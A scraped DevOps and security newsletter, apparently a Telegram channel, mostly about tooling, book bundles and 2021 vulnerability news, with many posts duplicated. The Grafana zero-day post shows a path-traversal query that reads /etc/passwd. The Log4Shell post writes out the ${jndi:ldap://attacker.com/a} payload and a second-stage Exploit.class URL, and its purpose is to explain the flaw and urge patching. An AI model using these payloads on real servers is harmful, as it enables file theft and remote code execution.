I have two recommendations of books bundles today. I was thinking if it makes sense to combine them into one message, but decided to push them separately.
So, the first one is a bundle of Python books by O'Reilly:
- Web Scrapping with Python
- Test Driven Development with Python
- Using Asyncio in Python
- High Performance Python
- Introducing Python
- Think Python
- Hands-On Unsupervised Learning Using Python
- Python Data Science Handbook
- Thoughtful Machine Learning with Python
- Flask Web Development
- Machine Learning Pocket Reference
- Hitchhiker's Guide to Python
- Elegant SciPy
- NLP with Python
As usual, you can pay at least €15.55 to unlock all of these books or pay less to unlock some of them. There's no upper limit, though. You can pay whatever you want and Humble Bundle will redirect your funds to charity.
# books #python #programming
So, the first one is a bundle of Python books by O'Reilly:
- Web Scrapping with Python
- Test Driven Development with Python
- Using Asyncio in Python
- High Performance Python
- Introducing Python
- Think Python
- Hands-On Unsupervised Learning Using Python
- Python Data Science Handbook
- Thoughtful Machine Learning with Python
- Flask Web Development
- Machine Learning Pocket Reference
- Hitchhiker's Guide to Python
- Elegant SciPy
- NLP with Python
As usual, you can pay at least €15.55 to unlock all of these books or pay less to unlock some of them. There's no upper limit, though. You can pay whatever you want and Humble Bundle will redirect your funds to charity.
# books #python #programming
Humble Bundle
Humble Book Bundle: Python Programming by O'Reilly
We’ve teamed up with O’Reilly for our newest bundle. Get ebooks like Introducing Python, 2nd Edition & High Performance Python, 2nd Edition. Plus, pay what you want & support charity!
The next book bundle is about security.
- Microsoft Azure Security and Privacy Concepts
- Hack Yourself First: How to go on the Cyber-Offense
- Security in the Cloud
- Security Compliance: The Big Picture
- Security for Hackers and Developers: Overview
- Threats, Attacks, and Vulnerabilities for CompTIA Security+
- Incident Detection and Investigation with QRadar
- AWS Cloud Security Best Practices
- Microsoft 365 Security: Threat Protection Implementation and Management
- Cisco CyberOps: Security Monitoring
- Cloud Security: Introduction to Certified Cloud Security Professional (CCSP(r))
- Linux Host Security
- Operationalizing Cyber Threat Intel: Pivoting & Hunting
- Security Awareness: Basic Concepts and Terminology
- Splunk Enterprise Security: Big Picture
- Threat Intelligence: Cyber Threats and Kill Chain Methodology
- Cyber Security Essentials: Your Role in Protecting the Company
- Security Management: A Case Study
- Security Awareness: Phishing - How Hackers Get Your Secrets
- Cyber Security Careers for IT Professionals
As usual, you can pay what you want. Minimum payment of €21.59 will unlock all 20 books.
#books #security
- Microsoft Azure Security and Privacy Concepts
- Hack Yourself First: How to go on the Cyber-Offense
- Security in the Cloud
- Security Compliance: The Big Picture
- Security for Hackers and Developers: Overview
- Threats, Attacks, and Vulnerabilities for CompTIA Security+
- Incident Detection and Investigation with QRadar
- AWS Cloud Security Best Practices
- Microsoft 365 Security: Threat Protection Implementation and Management
- Cisco CyberOps: Security Monitoring
- Cloud Security: Introduction to Certified Cloud Security Professional (CCSP(r))
- Linux Host Security
- Operationalizing Cyber Threat Intel: Pivoting & Hunting
- Security Awareness: Basic Concepts and Terminology
- Splunk Enterprise Security: Big Picture
- Threat Intelligence: Cyber Threats and Kill Chain Methodology
- Cyber Security Essentials: Your Role in Protecting the Company
- Security Management: A Case Study
- Security Awareness: Phishing - How Hackers Get Your Secrets
- Cyber Security Careers for IT Professionals
As usual, you can pay what you want. Minimum payment of €21.59 will unlock all 20 books.
#books #security
Humble Bundle
Humble Software Bundle: Cyber Security for Hackers and Developers
We’ve teamed up with Pluralsight for our newest bundle. Get software like Hack Yourself First: How to go on the Cyber-Offense & Security for Hackers and Developers: Overview. Plus, pay what you want & support charity!
An article about some attack vectors for your AWS environments and ways to protect yourself against them.
There's a neat tl;dr section on top of the article, so you can have a quick overview before diving deep into the article itself.
#aws #security
There's a neat tl;dr section on top of the article, so you can have a quick overview before diving deep into the article itself.
#aws #security
tl;dr sec
Lesser Known Techniques for Attacking AWS Environments
Techniques for initital access, recon, lateral movement, and exfil of AWS accounts, along with defensive mitigations
From our subscribers.
Application Delivery Technical Advisory Group of CNCF released the v1.0.0 of GitOps specification.
You can find the specification itself on the GitHub.
Basically, a GitOps system should comply with 4 main principles:
1. Declarative: A system managed by GitOps must have its desired state expressed declaratively.
2. Versioned and Immutable: Desired state is stored in a way that enforces immutability, versioning and retains a complete version history.
3. Pulled Automatically: Software agents automatically pull the desired state declarations from the source. Agents within the system pull the desired state from the repository.
4. Continuously Reconciled: Software agents continuously observe the actual system state and attempt to apply the desired state.
You could kinda deduce these principles already, but now they’re formalized. Besides, you can adopt these principles and, well, GitOps not only for your services, but for IaC as well.
There are still open questions, for example, how to handle incidents in the immutable environment. However, I like the overall direction. Specifically the point that even though we switched to “cattle” servers from the “pet” ones, we still trat environments as “pets” and we need to stop that.
I see that demand for running dynamic environments increasing across the industry. So, this is definitely a valid point and an interesting area to explore.
#gitops #cicd #culture
Application Delivery Technical Advisory Group of CNCF released the v1.0.0 of GitOps specification.
You can find the specification itself on the GitHub.
Basically, a GitOps system should comply with 4 main principles:
1. Declarative: A system managed by GitOps must have its desired state expressed declaratively.
2. Versioned and Immutable: Desired state is stored in a way that enforces immutability, versioning and retains a complete version history.
3. Pulled Automatically: Software agents automatically pull the desired state declarations from the source. Agents within the system pull the desired state from the repository.
4. Continuously Reconciled: Software agents continuously observe the actual system state and attempt to apply the desired state.
You could kinda deduce these principles already, but now they’re formalized. Besides, you can adopt these principles and, well, GitOps not only for your services, but for IaC as well.
There are still open questions, for example, how to handle incidents in the immutable environment. However, I like the overall direction. Specifically the point that even though we switched to “cattle” servers from the “pet” ones, we still trat environments as “pets” and we need to stop that.
I see that demand for running dynamic environments increasing across the industry. So, this is definitely a valid point and an interesting area to explore.
#gitops #cicd #culture
The New Stack
CNCF Working Group Sets Some Standards for ‘GitOps’
Engineers from GitHub, Microsoft, CodeFresh, , and other cloud native-savvy companies have banded together to assemble a set of definitions
Our tech stack differs from one company to another. However, there are certain things that almost everybody use. Like, for example, Git!
Here are some release notes for Git 2.34
This release introduces the use of sparse index for some of git commands.
You can read more about sparse checkout and sparse index here.
This is especially useful for monorepo users. Although, I haven't being working with one for more than 2 years now, I have some repos in mind, where I would like to test it.
As a bonus: An article about Git's data structures and their behavior. Commits are not diffs, folks!
#git
Here are some release notes for Git 2.34
This release introduces the use of sparse index for some of git commands.
You can read more about sparse checkout and sparse index here.
This is especially useful for monorepo users. Although, I haven't being working with one for more than 2 years now, I have some repos in mind, where I would like to test it.
As a bonus: An article about Git's data structures and their behavior. Commits are not diffs, folks!
#git
The GitHub Blog
Highlights from Git 2.34
To celebrate this most recent release, here's GitHub's look at some of the most interesting features and changes introduced since last time.
Ship / Show / Ask - A modern branching strategy
It's a branching strategy that combines the features of Pull Requests with the ability to keep shipping changes.
Changes are categorized as either:
- Ship (merge into mainline without review)
- Show (open a pull request for review, but merge into mainline immediately)
- Ask (open a pull request for discussion before merging)
From CatOps Chat
#github
It's a branching strategy that combines the features of Pull Requests with the ability to keep shipping changes.
Changes are categorized as either:
- Ship (merge into mainline without review)
- Show (open a pull request for review, but merge into mainline immediately)
- Ask (open a pull request for discussion before merging)
From CatOps Chat
#github
martinfowler.com
Ship / Show / Ask
Ship/Show/Ask is a branching strategy that helps teams wait less and ship more, without losing out on feedback.
👍1
Discount on courses + free certification on CKA, CKS etc + swag
https://training.linuxfoundation.org/cyber-monday-2021/
#education #courses
https://training.linuxfoundation.org/cyber-monday-2021/
#education #courses
Linux Foundation - Education
Promo Inactive - Linux Foundation - Education
Sign up for our newsletter to get updates on our latest promotions.
Our friends from Cossack Labs have released a new version of their Acra tool.
Acra is a database security suite for data protection. It provides application-level encryption for data fields, multi-layered access control, database leakage prevention, and intrusion detection capabilities in one suite. Acra was specifically designed for distributed apps (web, server-side and mobile) that store data in one or many databases. Basically, you can encrypt individual fields completely transparent for an application!
So, what's special about this release? A lot of features that previously were available only in the enterprise version now made their way to open source! Among them: database encryption, searchable encryption, and encryption-as-a-service API.
Apart from that, Acra allows to tokenize certain fields in your database to achieve anonymization. This is actually a cool feature! In one of my former companies we had to create our own tool to achieve that. Here you get it as a part of the package.
#security #databases #toolz
Acra is a database security suite for data protection. It provides application-level encryption for data fields, multi-layered access control, database leakage prevention, and intrusion detection capabilities in one suite. Acra was specifically designed for distributed apps (web, server-side and mobile) that store data in one or many databases. Basically, you can encrypt individual fields completely transparent for an application!
So, what's special about this release? A lot of features that previously were available only in the enterprise version now made their way to open source! Among them: database encryption, searchable encryption, and encryption-as-a-service API.
Apart from that, Acra allows to tokenize certain fields in your database to achieve anonymization. This is actually a cool feature! In one of my former companies we had to create our own tool to achieve that. Here you get it as a part of the package.
#security #databases #toolz
On our last voice chat we briefly discussed Kubernetes autoscaling and mentioned Karpenter - a cluster autoscaler backed by AWS.
This tool isn’t new. However, but AWS started to promote it recently. So, it’s probably “production ready enough” from their judgment. Also, it looks like Karpenter can work with spot instances, which makes it a super-interesting tool to follow.
You can read more about it in the AWS blog post.
If you are already using it or you have tried it, feel free to share your opinions in our chat!
#kubernetes #scaling #toolz
This tool isn’t new. However, but AWS started to promote it recently. So, it’s probably “production ready enough” from their judgment. Also, it looks like Karpenter can work with spot instances, which makes it a super-interesting tool to follow.
You can read more about it in the AWS blog post.
If you are already using it or you have tried it, feel free to share your opinions in our chat!
#kubernetes #scaling #toolz
karpenter.sh
Just-in-time Nodes for Any Kubernetes Cluster
A short but insightful article on how to perform threat modelling by GitLab
I covers some basics like building diagrams as well as describes popular STRIDE framework for threat modelling.
STRIDE stands for:
- Spoofing - Impersonating something or someone else
- Tampering - Modifying data or code
- Rrepudiation - Claiming to have not performed an action
- Information disclosure -Exposing information to someone not authorized to see it
- Denial of service - Deny or degrade service to users
- Elevation of privilege - Gain capabilities without proper authorization
Here you can find a bit more detailed description for each area with some examples.
P.S. In general, GitLab has a lot of great documentation and blog posts in free access, not only on security or operational topics but on various work aspects. I strongly suggest checking out their handbook. Maybe, you can find there some guidance on topics that are important for you at the moment.
#security
I covers some basics like building diagrams as well as describes popular STRIDE framework for threat modelling.
STRIDE stands for:
- Spoofing - Impersonating something or someone else
- Tampering - Modifying data or code
- Rrepudiation - Claiming to have not performed an action
- Information disclosure -Exposing information to someone not authorized to see it
- Denial of service - Deny or degrade service to users
- Elevation of privilege - Gain capabilities without proper authorization
Here you can find a bit more detailed description for each area with some examples.
P.S. In general, GitLab has a lot of great documentation and blog posts in free access, not only on security or operational topics but on various work aspects. I strongly suggest checking out their handbook. Maybe, you can find there some guidance on topics that are important for you at the moment.
#security
GitLab
Threat Modeling HowTo
A howto for the threat modeling process at GitLab.
I'm a bit hesitant of posting hot news, because there are usually people, who do that faster than me.
This one is worth mentioning, though. Grafana fixed 0-day vulnerability that was discovered yesterday.
Vulnerability in nutshell, in case you've missed it. You were able to access restricted locations with a query like this one:
Versions
#security
This one is worth mentioning, though. Grafana fixed 0-day vulnerability that was discovered yesterday.
Vulnerability in nutshell, in case you've missed it. You were able to access restricted locations with a query like this one:
/public/plugins/<PLUGIN>/../../../../../../../etc/passwd
Versions
8.3.1, 8.2.7, 8.1.8, and 8.0.7 were released recently and have a patch for this vulnerability. Make sure to upgrade!#security
BleepingComputer
Grafana fixes zero-day vulnerability after exploits spread over Twitter
Open-source analytics and interactive visualization solution Grafana received an emergency update today to fix a high-severity, zero-day vulnerability that enabled remote access to local files.
Astrologists declare a week of application delivery.
So today, I want to share with you an article that touches the problem of delivering infrastructure dependencies in the modern world.
The problem statement is that almost no applications are running purely on their own. Especially, if we're talking about corporate backend services. These applications require databases, queues, blob storage and many more dependencies to run correctly.
Who's responsible for that, though? Is it application developers? Well, in this case, they'll need to learn a bunch of things related to those topics. It likely doesn't have much sense from a business point of view. On another hand, creating a separate team to provide dependencies on-demand literally brings us a decade back to the "throwing code over the wall" and "ticket-based software delivery" approaches.
In this article, an author argues that bundling application dependencies alongside with the codebase is the best way to go. One can have a team that delivers these building blocks and a developer then combine them like a Lego in their config files.
This is a very interesting approach (at least for me) and I truly believe that this would be the next big thing in DevOps-ish world. As for now, though, an author mentions a few tools that could help here. However, in my humble opinion, an existing toolset is not quite there yet and there is still a long way to go.
P.S. I wanted to write a real blog post on this topic as well. Unfortunately, I don't know how to motivate myself. Therefore, I would rather create a series of small Telegram posts with on this topic. Stay tuned!
#app_bundle #kubernetes #crossplane
So today, I want to share with you an article that touches the problem of delivering infrastructure dependencies in the modern world.
The problem statement is that almost no applications are running purely on their own. Especially, if we're talking about corporate backend services. These applications require databases, queues, blob storage and many more dependencies to run correctly.
Who's responsible for that, though? Is it application developers? Well, in this case, they'll need to learn a bunch of things related to those topics. It likely doesn't have much sense from a business point of view. On another hand, creating a separate team to provide dependencies on-demand literally brings us a decade back to the "throwing code over the wall" and "ticket-based software delivery" approaches.
In this article, an author argues that bundling application dependencies alongside with the codebase is the best way to go. One can have a team that delivers these building blocks and a developer then combine them like a Lego in their config files.
This is a very interesting approach (at least for me) and I truly believe that this would be the next big thing in DevOps-ish world. As for now, though, an author mentions a few tools that could help here. However, in my humble opinion, an existing toolset is not quite there yet and there is still a long way to go.
P.S. I wanted to write a real blog post on this topic as well. Unfortunately, I don't know how to motivate myself. Therefore, I would rather create a series of small Telegram posts with on this topic. Stay tuned!
#app_bundle #kubernetes #crossplane
Danielmangum
Infrastructure in Your Software Packages
This post explores what a future of shipping infrastructure alongside software may look like by detailing where we are today, and evaluating how the delivery of software has evolved over time. If you just want the big ideas, skip to the final section: A New…
TF 1.1.0 was released, and maybe the most interesting feature is the ability to force vars to be not-null
By default, all variables set implicitly to
#terraform
Non-nullable with a default: if left unset, or set explicitly to null, then
# it takes on the default value
# In this case, the module author can safely assume var.d will never be null
variable "e" {
nullable = false
default = "hello"
}
# Non-nullable with no default: variable must be set, and cannot be null.
# In this case, the module author can safely assume var.d will never be null
variable "d" {
nullable = false
}
By default, all variables set implicitly to
nullable = true.#terraform
0-day vulnerability found in the popular Java log4j library.
Now, why is it important.
You may like Java or not, but it is a crazily popular programming language. Runs on billions of devices, bla-bla.
The exploit is stupidly silly. An attacker just needs a malicious server and arbitrary Java code that they want to execute on the victim's machine. Here how it works:
1. Data from the User gets sent to the server (via any protocol),
2. The server logs the data in the request, containing the malicious payload:
3. The
4. This response contains a path to a remote Java class file (ex. https://second-stage.attacker.com/Exploit.class) which is injected into the server process,
5. This injected payload triggers a second stage, and allows an attacker to execute arbitrary code.
It looks like the quickest mitigation is to set
Also, check your Java services' logs. Maybe, you already are poisoned.
#security #0day
Now, why is it important.
You may like Java or not, but it is a crazily popular programming language. Runs on billions of devices, bla-bla.
log4j is a very popular, if not the most popular, logging library for Java. If you have Java services in your landscape, and they write logs, chances are high they use log4j.The exploit is stupidly silly. An attacker just needs a malicious server and arbitrary Java code that they want to execute on the victim's machine. Here how it works:
1. Data from the User gets sent to the server (via any protocol),
2. The server logs the data in the request, containing the malicious payload:
${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server),3. The
log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI),4. This response contains a path to a remote Java class file (ex. https://second-stage.attacker.com/Exploit.class) which is injected into the server process,
5. This injected payload triggers a second stage, and allows an attacker to execute arbitrary code.
It looks like the quickest mitigation is to set
-Dlog4j2.formatMsgNoLookups=true Java parameter for all your services if you're using log4j >= 2.10 or re-configure JDK.Also, check your Java services' logs. Maybe, you already are poisoned.
#security #0day
GitLab issued new security releases: 14.5.2, 14.4.4, and 14.3.6
These releases contain patches for various security vulnerabilities, including one with High severity.
So, if you're running your own GitLab Community Edition (CE) or Enterprise Edition (EE), make sure to upgrade!
#gitlab #security
These releases contain patches for various security vulnerabilities, including one with High severity.
So, if you're running your own GitLab Community Edition (CE) or Enterprise Edition (EE), make sure to upgrade!
#gitlab #security
GitLab
GitLab Security Release: 14.5.2, 14.4.4, and 14.3.6
Learn more about GitLab Security Release: 14.5.2, 14.4.4, and 14.3.6 for GitLab Community Edition (CE) and Enterprise Edition (EE).
Amazon has published a public postmortem for the recent issues on Friday. However, it went through a little bit unnoticed because of the Log4j story (see one of the previous posts).
So, the original issue is happened to be a cascading failure, which led to congestion in AWS internal networks. This is an interesting part, because it puts some light on AWS internals.
So, the internal monitoring system as well as parts of control plane for EC2 reside in the internal network, which experienced issues. That's why AWS team was operating with partial visibility of their systems, which impacted the speed of resolution.
Customer services were still running, but their control APIs were impacted. For example, your existing EC2 machines were there, but you could neither describe them, not start a new one. These matters happened to be more critical for certain services within AWS line API Gateways and Amazon Connect.
The interesting thing is that these events were caused by the code that was there for years (according to AWS). Unfortunately, an unexpected behavior was revealed during an automated scaling event.
To mitigate such issues in future, AWS switched off automatic scaling in us-east-1. They claim that they have enough capacity already. As well as they're working on a fix for the part of code that caused the co congestion in the first place. I assume, there are many other internal action items from this outage as well.
#aws #postmortem
So, the original issue is happened to be a cascading failure, which led to congestion in AWS internal networks. This is an interesting part, because it puts some light on AWS internals.
So, the internal monitoring system as well as parts of control plane for EC2 reside in the internal network, which experienced issues. That's why AWS team was operating with partial visibility of their systems, which impacted the speed of resolution.
Customer services were still running, but their control APIs were impacted. For example, your existing EC2 machines were there, but you could neither describe them, not start a new one. These matters happened to be more critical for certain services within AWS line API Gateways and Amazon Connect.
The interesting thing is that these events were caused by the code that was there for years (according to AWS). Unfortunately, an unexpected behavior was revealed during an automated scaling event.
To mitigate such issues in future, AWS switched off automatic scaling in us-east-1. They claim that they have enough capacity already. As well as they're working on a fix for the part of code that caused the co congestion in the first place. I assume, there are many other internal action items from this outage as well.
#aws #postmortem
Last week, I promised a series of posts about modern application delivery. Last time, we briefly discussed the problems that are generated by the disconnection between application code and its infrastructure dependencies.
Today, let's talk about a proposed formal way of solving this issue - Open Application Model. This is a specification of application bundle definition that contains all the required components as well as traits (we'll talk later on this one). The main purpose is to provide a reasonable abstraction for customers. So, they can use components and traits as building blocks for their application's infra dependencies.
This concept was proposed by people from Alibaba Cloud (and Microsoft?) and the whole thing is fairly new. However, it already has an implementation for Kubernetes - KubeVela. Although, I still have unanswered questions for this tool. For example, is it possible to provide default traits? What should I do if I want all my apps to have an autoscaler, etc.?
In any case, those are implementation details. Nothing stops you from embracing concepts of OAM and implementing them using, let's say, Helm.
As a bonus, here is a great video by Viktor Farcic about KubeVela with some basic "Hello world" example. It helps to better understand the problem that OAM is trying to solve as well as its concepts like components, traits and the difference between them. 'Coz the official documentation, let's be honest, is not that great.
https://youtu.be/2CBu6sOTtwk
#oam #app_bundle #kubernetes
Today, let's talk about a proposed formal way of solving this issue - Open Application Model. This is a specification of application bundle definition that contains all the required components as well as traits (we'll talk later on this one). The main purpose is to provide a reasonable abstraction for customers. So, they can use components and traits as building blocks for their application's infra dependencies.
This concept was proposed by people from Alibaba Cloud (and Microsoft?) and the whole thing is fairly new. However, it already has an implementation for Kubernetes - KubeVela. Although, I still have unanswered questions for this tool. For example, is it possible to provide default traits? What should I do if I want all my apps to have an autoscaler, etc.?
In any case, those are implementation details. Nothing stops you from embracing concepts of OAM and implementing them using, let's say, Helm.
As a bonus, here is a great video by Viktor Farcic about KubeVela with some basic "Hello world" example. It helps to better understand the problem that OAM is trying to solve as well as its concepts like components, traits and the difference between them. 'Coz the official documentation, let's be honest, is not that great.
https://youtu.be/2CBu6sOTtwk
#oam #app_bundle #kubernetes
YouTube
Cloud-Native Apps With Open Application Model (OAM) And KubeVela
Can we define cloud-native applications without dealing with resources related to underlying platforms? One possible solution is to use the Open Application Model (OAM) combined with KubeVela.
#oam #kubevela #k8s #kubernetes #cloud-native
▬▬▬▬▬▬ Timecodes…
#oam #kubevela #k8s #kubernetes #cloud-native
▬▬▬▬▬▬ Timecodes…
I don't know a corresponding idiom in English, so I put it as it is.
Наша пісня гарна й нова - починаймо її знову!
P.S. If you know the corresponding idiom in English, please, let me know in the chat.
#security
Наша пісня гарна й нова - починаймо її знову!
The fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack.
P.S. If you know the corresponding idiom in English, please, let me know in the chat.
#security
GitHub
CVE-2021-45046 - GitHub Advisory Database
Incomplete fix for Apache Log4j vulnerability
Log4Shell exploit for the popular Log4j library has impacted a lot of Java services all over the globe including the popular Elastic stack.
Here is what you need to know about Log4j and ElasticSearch
#security #elasticsearch
Here is what you need to know about Log4j and ElasticSearch
#security #elasticsearch
xeraa.net
Mitigate Log4j / Log4Shell in Elasticsearch (CVE-2021-44228)
What Log4j version are you using, what mitigations are already in place, and what should you do next. Continuously updated to cover CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, and CVE-2021-44832.
Holiday Book Recommendations by Gergely Orosz - an author of The Pragmatic Engineer blog.
A bit unfortunate for me that this article was published on 17th of December, while I have already bought some engineering books before the end of the year (we have a special budget for that in my company). However, 4 out 5 books I’ve bought are in this list :)
The only exception is Database Internals, but I guess this book is just too specific for a generic IT book recommendation.
So, I hope you can find something interesting for you in this list! There are multiple categories there, from engineering management to technology-specific topics. Also, “The Pragmatic Engineer” is a really cool blog about IT in general as well as some European specifics. I read it myself and can totally recommend it!
Happy upcoming holidays!
#books
A bit unfortunate for me that this article was published on 17th of December, while I have already bought some engineering books before the end of the year (we have a special budget for that in my company). However, 4 out 5 books I’ve bought are in this list :)
The only exception is Database Internals, but I guess this book is just too specific for a generic IT book recommendation.
So, I hope you can find something interesting for you in this list! There are multiple categories there, from engineering management to technology-specific topics. Also, “The Pragmatic Engineer” is a really cool blog about IT in general as well as some European specifics. I read it myself and can totally recommend it!
Happy upcoming holidays!
#books
The Pragmatic Engineer
Tech Books for the Holidays
Books perfect as reading or gifts during the end-of-year break for those working in tech. 95 book recommendations.
Apache Issues 3rd Patch to Fix New High-Severity Log4j Vulnerability
Tracked as CVE-2021-45105 (CVSS score: 7.5), the new vulnerability affects all versions of the tool from 2.0-beta9 to 2.16.0, which the open-source nonprofit shipped earlier this week to remediate a second flaw that could result in remote code execution (CVE-2021-45046), which, in turn, stemmed from an "incomplete" fix for CVE-2021-44228, otherwise called the Log4Shell vulnerability.
#security
Tracked as CVE-2021-45105 (CVSS score: 7.5), the new vulnerability affects all versions of the tool from 2.0-beta9 to 2.16.0, which the open-source nonprofit shipped earlier this week to remediate a second flaw that could result in remote code execution (CVE-2021-45046), which, in turn, stemmed from an "incomplete" fix for CVE-2021-44228, otherwise called the Log4Shell vulnerability.
#security